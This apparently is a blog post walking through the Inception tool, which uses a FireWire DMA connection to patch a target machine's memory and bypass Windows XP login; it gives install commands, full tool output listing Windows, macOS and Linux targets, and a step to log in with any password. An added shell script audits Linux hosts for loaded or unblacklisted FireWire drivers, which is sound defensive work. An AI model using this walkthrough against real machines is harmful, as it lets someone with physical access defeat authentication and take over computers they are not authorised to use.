# Bypass local authentication with Inception


## Introduction

## Inception

## Configuration and installation

```
# cat /etc/modprobe.d/blacklist-firewire.conf
# Select the legacy firewire stack over the new CONFIG_FIREWIRE one.

blacklist ohci1394
blacklist sbp2
blacklist dv1394
blacklist raw1394
blacklist video1394

#blacklist firewire-ohci
#blacklist firewire-sbp2
# update-initramfs -k all -u
# reboot
# lsmod | grep -e firewire -e 1394
firewire_sbp2          15041  0
firewire_net           13560  0
ieee1394               94771  1 sbp2
firewire_ohci          24959  0
firewire_core          51857  3 firewire_sbp2,firewire_net,firewire_ohci
crc_itu_t               1715  1 firewire_cor
# apt-get install git cmake python3 g++
# libforensic1394="http://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz"
# wget --no-check-certificate $libforensic1394
# tar xzvf libforensic1394-0.2.tar.gz
# cd libforensic1394-0.2
# cmake CMakeLists.txt
# make install
# cd python
# python3 setup.py install
# cd
# git clone https://github.com/carmaa/inception.git
# cd inception
# ./setup.py install
# cd
```

## Bypassing Windows XP local authentication

1. Connect a firewire cable (4/4 or 4/6 pin) between your computer and the target.
2. Execute the tool:

```
# incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.2 (C) Carsten Maartmann-Moe 2012

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
[7] Linux Mint: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 4
[*] Selected target: Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] DMA shields should be down by now. Attacking...
[*] Searching,  334 MiB so far
[*] Signature found at 0x14eb7862 (in page # 85687)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
```

3. Log in to the target computer using an existing user and any password you prefer.
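
The target list above includes Ubuntu and Linux Mint, so a defender may want to check whether a Linux host has the FireWire drivers named on this page loaded or left free to load. The script below is an added example, not part of the original post or of Inception; it assumes that keeping these drivers out of the kernel closes the FireWire path used here, and its sample inputs are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. Module names are the ones shown
# on this page; both sample inputs are constructed for illustration.
FW_MODULES="firewire_core firewire_ohci firewire_sbp2 firewire_net ieee1394 ohci1394 sbp2 raw1394 video1394 dv1394"

# loaded_fw TEXT: FireWire modules present in lsmod-style TEXT, one per line.
loaded_fw() {
    printf '%s\n' "$1" | awk -v list="$FW_MODULES" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        ($1 in want) { print $1 }'
}

# blacklisted TEXT: modules with an active "blacklist" line in modprobe.d TEXT.
# Commented-out lines never match; modprobe treats "-" and "_" as equivalent.
blacklisted() {
    printf '%s\n' "$1" | awk '
        $1 == "blacklist" && NF >= 2 { gsub(/-/, "_", $2); print $2 }'
}

# audit LSMOD_TEXT CONF_TEXT: print one finding per line, nothing when clean.
#   LOADED <mod>           driver is in the running kernel
#   NOT-BLACKLISTED <mod>  no active blacklist line, so it can still autoload
audit() {
    ld=$(loaded_fw "$1")
    bl=$(blacklisted "$2")
    for m in $FW_MODULES; do
        if printf '%s\n' "$ld" | grep -qx "$m"; then
            echo "LOADED $m"
        elif ! printf '%s\n' "$bl" | grep -qx "$m"; then
            echo "NOT-BLACKLISTED $m"
        fi
    done
}

# Constructed sample: new stack loaded, only part of the list blacklisted.
SAMPLE_LSMOD='Module                  Size  Used by
firewire_ohci          24959  0
firewire_core          51857  1 firewire_ohci
crc_itu_t               1715  1 firewire_core'
SAMPLE_CONF='blacklist ohci1394
blacklist sbp2
#blacklist firewire-ohci
blacklist firewire-sbp2'

audit "$SAMPLE_LSMOD" "$SAMPLE_CONF"
# On a real host: audit "$(lsmod)" "$(cat /etc/modprobe.d/*.conf)"
```

A `blacklist` line only stops alias-based autoloading, and an explicit `modprobe` still loads the module, so `LOADED` is the finding to act on first.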

1 comment:

Alguien said...

Paranoia level rising... ;)
A hug.
T.